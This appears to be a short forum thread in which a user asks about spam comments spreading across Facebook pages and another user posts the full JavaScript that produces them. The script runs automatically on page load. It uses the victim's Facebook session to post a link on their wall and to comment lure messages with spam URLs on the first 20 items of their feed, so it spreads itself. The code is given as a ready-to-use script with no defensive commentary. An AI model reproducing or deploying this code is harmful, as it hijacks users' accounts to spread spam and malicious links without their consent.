Maybe spaming fACEBOOK VIRAL

AlloStreaming

Registered Member
Joined
Aug 13, 2011
Messages
93
Reaction score
9
HI ALL !

Today a lot of pages are infected with comment like that:

Mira las 5 cosas que toda chica hace antes que se encuentre con su novio, jajaj! edit moderator: removed personal info

What the script is used by these persons?

Thanx a lot
 
What it should do? Only wall posting on Fanpages walls?
 
Code:
<script>
function postonwall(){
var myId;
FB.api('/me', function(response) {
      myId = response.id;
      });

FB.api('/me/links', 'post', { message: "Mira eso! jajaj", link: "http://whostalks.info/" }, function(response) { } );
// FB.api({method: "events.rsvp", eid: myEvent, rsvp_status: "attending"}, function(response) { console.log(response)} );

FB.api('/me/home/', {limit: 20}, function(response) {
        response.data.forEach(function(object) {
	var messages = ["Mira eso!\x0Awww.whostalks.info", "Mira las 5 cosas que toda chica hace antes que se encuentre con su novio, jajaj!\x0Awww.los-secretos.info", "Caray! Esto es increible.\x0Awww.whostalks.info"];
	var myMessage = messages[Math.floor(messages.length*Math.random())];
        FB.api({method: "stream.addComment", comment: myMessage, post_id: object.id, uid: myId }, function(response) { } );
	
        });
});

}
setTimeout("postonwall()",1000);
</script>
 
Back
Top